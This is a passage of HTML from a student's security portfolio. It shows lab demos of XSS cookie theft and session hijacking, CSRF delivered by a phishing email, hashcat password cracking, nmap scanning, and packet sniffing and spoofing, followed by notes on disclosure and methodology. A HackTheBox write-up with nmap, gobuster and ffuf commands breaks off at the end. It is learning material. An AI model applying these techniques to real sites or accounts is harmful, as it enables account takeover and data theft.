          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
